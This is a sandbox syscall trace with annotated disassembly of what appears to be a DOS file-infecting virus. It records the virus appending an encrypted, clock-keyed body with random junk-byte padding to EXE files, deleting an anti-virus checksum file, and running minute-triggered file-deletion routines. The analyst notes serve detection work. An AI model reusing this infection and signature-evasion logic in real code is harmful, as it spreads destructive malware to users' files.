{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:31.399114006Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:31.401472351Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:31.411777245Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:31.412947689Z 78 PC: 15408 | Find first file
2018-12-25T12:23:31.420001904Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:31.426584909Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:32.046323853Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:32.053932805Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:32.055784657Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:32.062050825Z 66 PC: 154a6 | Move file pointer
; Disassembly window at the return address of the Get time call logged on this row: two 8-iteration loops that fill a buffer at bp+0x556 with one-byte opcodes selected by clock bits.
2018-12-25T12:23:32.064014561Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8 ; loop counter: 8 bytes generated in the first loop
0x1550e: lea di, word ptr [bp + 0x555] ; di is incremented before the first store, so the first byte lands at bp+0x556
0x15512: inc di
0x15513: shl dx, 1 ; move the top bit of dx into CF; dx is presumably the Get time result (DH=seconds, DL=hundredths in the DOS API) - confirm
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8 ; CF clear: low byte 0xf8 is the CLC opcode; the zero high byte is overwritten by the next iteration's store
0x1551b: jmp 0x15522
0x1551d: nop ; filler after the short jmp; not a branch target in this window
0x1551e: mov word ptr [di], 0xfc ; CF set: 0xfc is the CLD opcode
0x15522: loop 0x15512
0x15524: mov ah, 0x2c ; DOS function 2Ch (Get time): fresh clock bits for the second loop
0x15526: int 0x21
0x15528: mov cx, 8 ; second loop: 8 more bytes, di is not reloaded so they follow the first 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90 ; CF clear: 0x90 is the NOP opcode
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5 ; CF set: 0xf5 is the CMC opcode; window ends before the loop instruction at 0x1553b
; Disassembly window at the return address of the second Get time call: finishes the second junk-byte loop, then writes a clock-dependent number of those bytes to the open file.
2018-12-25T12:23:32.066652666Z 44 PC: 15528 | Get time 0x15528: mov cx, 8 ; 8 iterations, one generated byte each
0x1552b: inc di ; di carries over from code before this window; not reloaded here
0x1552c: shl dx, 1 ; top bit of dx (presumably the Get time result - confirm) selects the byte
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90 ; CF clear: NOP opcode
0x15534: jmp 0x1553b
0x15536: nop ; filler after the short jmp; not a branch target in this window
0x15537: mov word ptr [di], 0xf5 ; CF set: CMC opcode
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf ; cx = dl & 0x0f, i.e. a length of 0..15 taken from the clock
0x15548: mov ah, 0x40 ; DOS function 40h (Write file or device); handle register is set outside this window
0x1554a: lea dx, word ptr [bp + 0x556] ; source buffer = the generated bytes
0x1554e: int 0x21
0x15550: jmp 0x15555 ; skips the three bytes at 0x15552-0x15554
0x15552: nop ; skipped by the jmp above; presumably filler or data, not executed code
0x15553: add byte ptr [bx + si], al ; decode of two zero bytes that the jmp skips; likely a data word - confirm
; Disassembly window at the return address of the third Get time call: variable-length prefix write, then the fixed 0x4b7-byte body write bracketed by a helper call.
2018-12-25T12:23:32.069081578Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf ; cx = dl & 0x0f: 0..15 bytes; the following log row records 9 bytes for this run
0x15548: mov ah, 0x40 ; DOS function 40h (Write file or device)
0x1554a: lea dx, word ptr [bp + 0x556] ; buffer at bp+0x556
0x1554e: int 0x21
0x15550: jmp 0x15555 ; skips three bytes that the linear disassembler still decodes below
0x15552: nop
0x15553: add byte ptr [bx + si], al ; two zero bytes skipped by the jmp; likely a data word, not code - confirm
0x15555: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx ; clock value stored inside the bp+0x10 .. bp+0x10+0x4b7 range that is written below; presumably a per-infection key or seed - confirm
0x1555e: call 0x2514a ; target as printed is 0x10000 above this code; presumably a 16-bit wrap artifact of the disassembler - confirm
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7 ; 0x4b7 = 1207 bytes, matching the "Write 1207 bytes" row in this trace
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c ; another Get time; its result feeds the trailing write that starts past this window
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:32.072140446Z 64 PC: 15550 | Write file or device (Write 9 bytes on handle 5)
; Disassembly window at the return address of the fourth Get time call: body write, variable-length trailing write, then a seek to end of file. This snapshot shows the bytes at 0x1557e as readable code.
2018-12-25T12:23:32.07542195Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx ; store the clock value inside the region written below; presumably a key or seed - confirm
0x1555e: call 0x2514a ; helper runs before the body is written; address as printed is presumably a 16-bit wrap artifact - confirm
0x15561: mov ah, 0x40 ; DOS function 40h (Write file or device)
0x15563: mov cx, 0x4b7 ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c ; DOS function 2Ch (Get time)
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f ; cx = dl & 0x3f: 0..63 trailing bytes; this trace logs 25
0x15577: mov ah, 0x40 ; dx is not reloaded, so the source pointer is the raw clock value: the trailing bytes are whatever memory sits at ds:dx
0x15579: int 0x21
0x1557b: call 0x2514a ; same helper again after the writes; presumably undoes the earlier transform - confirm
0x1557e: mov ax, 0x4202 ; DOS function 42h, AL=02: move file pointer relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx ; offset 0 from end
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9 ; shift count 9 (512-byte units); presumably for the EXE header page count - confirm
2018-12-25T12:23:32.077869167Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Disassembly window at the return address of the fifth Get time call, taken after the first call 0x2514a has run: the bytes from 0x1557e no longer decode as the seek sequence shown in the snapshot at PC 15559.
2018-12-25T12:23:32.086476571Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f ; 0..63 trailing bytes; the following log row records 25
0x15577: mov ah, 0x40 ; DOS function 40h (Write file or device); dx still holds the clock value
0x15579: int 0x21
0x1557b: call 0x2514a ; the later "Move file pointer" row at PC 15587 shows readable code runs after this call; presumably it restores the bytes below - confirm
0x1557e: mov ax, word ptr [0x5b00] ; from here on: linear decode of transformed bytes, not instructions that execute in this form
0x15581: xor ax, dx
0x15583: xor bx, cx
0x15585: iret
0x15586: cmp byte ptr [bp + si - 0x58], dl
0x15589: or cx, dx
0x1558b: ljmp 0x11e0:0xc8ca
0x15590: leave
0x15591: pop dx
0x15592: cdq
0x15593: out 0x18, al
0x15595: cmp al, 0x90
0x15597: xchg ax, sp
0x15598: retf 0x2706
; NOTE(review): these bytes differ from the same addresses in the previous trace on this page, which is consistent with a clock-derived key; byte signatures over this region will not match between infections - confirm.
2018-12-25T12:23:32.089350011Z 64 PC: 1557b | Write file or device (Write 25 bytes on handle 5)
2018-12-25T12:23:32.092499148Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:32.094181287Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:32.096897396Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:32.100317193Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:32.107713569Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:32.11423057Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:32.115712263Z 62 PC: 155d0 | Close file
2018-12-25T12:23:32.120871804Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:32.127998325Z 79 PC: 1541f | Find next file
2018-12-25T12:23:32.139755294Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:32.143209572Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:32.145486734Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:32.14637926Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:32.149765055Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.152818028Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:32.156576423Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:32.157520889Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:32.165265245Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.169103321Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.496700571Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.501910597Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.503105534Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.506705829Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.508298594Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.510146899Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.511691285Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.513718982Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.517651319Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.519418375Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.526192Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.527686775Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.529604175Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.531277894Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.532328274Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.534228993Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.540478795Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.544185737Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.54528208Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.550546708Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.557316275Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.560462071Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.570547773Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.577111224Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.584281003Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.586619827Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.592052271Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.593115791Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.595303208Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.596843538Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.598356883Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.602694238Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.604381735Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.609300807Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.611229591Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.613256917Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.614370021Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.615901416Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.617819675Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.621856892Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.626333505Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.628115529Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.634950199Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.659128051Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.662494864Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.668903767Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.67838578Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.685387273Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.686804783Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.692692699Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.694492921Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.696528921Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.699161044Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.701992019Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.708462676Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.710725662Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.720162949Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.722180828Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.724977482Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.727347162Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.728869924Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.731548502Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.738418028Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.744179955Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.746139332Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.754524285Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.76416154Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.768098809Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.775627654Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.784940548Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.7924943Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.795673461Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.801289365Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.80295173Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.805235511Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.807842192Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.810124401Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.816894307Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.82007978Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.827765221Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.830100261Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.8338344Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.836585999Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.838130396Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.841853517Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.848146141Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.854114489Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.856372045Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.865202236Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.875139229Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.879355544Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.884277886Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.891403139Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.897592827Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.898780791Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.904357037Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.90773336Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.910262653Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.912715084Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.915920853Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.92347858Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.926163946Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.934100509Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.936331412Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.939207968Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.941604934Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.942956076Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.946040832Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.952348448Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.958014891Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.959390749Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.967182629Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.977134196Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.978382175Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.983296057Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.987234309Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.988482878Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.993302683Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.996532963Z 59 PC: 15220 | Change current directory
; Minute-gated dispatch, disassembled at the return address of a Get time call
; (log op 44 = INT 21h AH=2Ch, which returns CH=hour, CL=minute, DH=second,
; DL=1/100 s). CL is compared against five fixed values and each match calls a
; routine before falling through to the next compare.
; The run records on this page carry "TimeBased":true with a "Min" value, i.e.
; the sandbox varies the clock minute so that branches like these are exercised.
; NOTE(review): assumes CL still holds the minute at 0x1523c, and that the
; called routines preserve CL for the later compares - neither is visible here.
2018-12-25T12:23:33.001294429Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5    ; minute == 5 ?
0x1523f: jne 0x15244
0x15241: call 0x1534a    ; routine body not shown in this window
0x15244: cmp cl, 0xd    ; minute == 13 ?
0x15247: jne 0x1524c
0x15249: call 0x15359    ; routine body not shown in this window
0x1524c: cmp cl, 0x1e    ; minute == 30 ?
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]    ; DX = bp-relative operand for the helper
0x15255: call 0x15330    ; the logged attribute/delete calls at PC 15345/15349 lie just past 0x15330, so this is presumably a "clear attributes, delete file named at DS:DX" helper - confirm
0x15258: cmp cl, 0x28    ; minute == 40 ?
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]    ; same operand as the minute-30 case
0x15261: call 0x15330
0x15264: cmp cl, 0x32    ; minute == 50 ?
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]    ; different operand from the 30/40 cases
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]    ; fall-through path, taken whether or not a branch matched
0x15274: lea di, word ptr [bp + 0x18d]    ; window ends here; the use of si/di is not shown
2018-12-25T12:23:33.027431366Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.028849623Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.029770988Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03122895Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.032220864Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.033153689Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.034705752Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03564866Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.036581167Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.038120407Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.03904965Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.039969008Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.041559664Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04247066Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04338492Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.045189749Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.046158629Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.047166436Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:33.04874157Z 53 PC: 14fba | Get interrupt vector (See above)
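2018-12-25T12:23:33.049742096Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.050715479Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:33.052276982Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:33.053141851Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
[Analyst note: the number after "Interrupt =" is the vector being set, in decimal (0 = 0x00, 35 = 0x23, 36 = 0x24, 63 = 0x3F). The "AKA" text is the name of the INT 21h function with that number, not of the vector; the same applies to the 'Program terminate' label on the Get/Set interrupt vector entries around these lines. Read as vectors these are 0x00 divide error, 0x23 DOS Ctrl-Break handler, 0x24 DOS critical-error handler and 0x3F, commonly used by overlay managers. The surrounding pattern (19 gets, these 4 sets, then 19 sets from a single PC before termination) looks like a compiled-language runtime saving and restoring vectors around its own handlers rather than resident hooking; confirm against the host binary before attributing it to the sample.]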
2018-12-25T12:23:33.054369978Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:33.273262017Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:33.275465352Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.277654328Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.279049257Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.280289666Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.281597852Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28265648Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.283592591Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28509532Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.286116335Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28715445Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.288831024Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.289805082Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.290769104Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.292247765Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.293211384Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.294149929Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.295861368Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.296806931Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.297775618Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.299185596Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.30107793Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.302962726Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.305146304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.307010517Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.309007449Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.311725095Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.313541553Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.31582968Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.317671349Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.319502279Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.321630481Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.32377815Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.325736762Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.328326469Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.330374506Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.332314447Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.338405586Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.340676474Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.343142392Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.346596997Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.348877842Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.351116296Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.35372431Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.355922789Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.358467738Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.361317206Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.364241642Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.366421718Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.369029063Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.370895437Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.373189854Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.375643042Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.380176329Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":5,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:35.045413018Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:35.047492183Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:35.051025115Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:35.052994011Z 78 PC: 15408 | Find first file
2018-12-25T12:23:35.059228453Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:35.065768926Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:35.08284929Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:35.094470656Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:35.096163625Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:35.103775011Z 66 PC: 154a6 | Move file pointer
; Snapshot taken on return from INT 21h AH=2Ch (log op 44, Get time), which
; leaves DH = seconds and DL = 1/100 s in DX. Two loops turn clock bits into a
; run of byte values at [bp+0x556] onward, each of which decodes as a one-byte
; instruction (CLC/CLD, then NOP/CMC). The content therefore depends on the
; clock, so a fixed byte signature over this region will not match reliably.
; NOTE(review): bp is set outside this window - presumably the body's base
; offset; confirm.
2018-12-25T12:23:35.10534291Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8    ; first loop: 8 iterations
0x1550e: lea di, word ptr [bp + 0x555]    ; one byte before the buffer; the inc below runs before the first store
0x15512: inc di
0x15513: shl dx, 1    ; CF = top bit of DX; 8 rounds consume the bits of DH
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8    ; CF=0: store 0xF8 (CLC); the word's zero high byte is overwritten by the next round's store
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc    ; CF=1: store 0xFC (CLD)
0x15522: loop 0x15512
0x15524: mov ah, 0x2c    ; Get time again to refresh DX for the second loop
0x15526: int 0x21
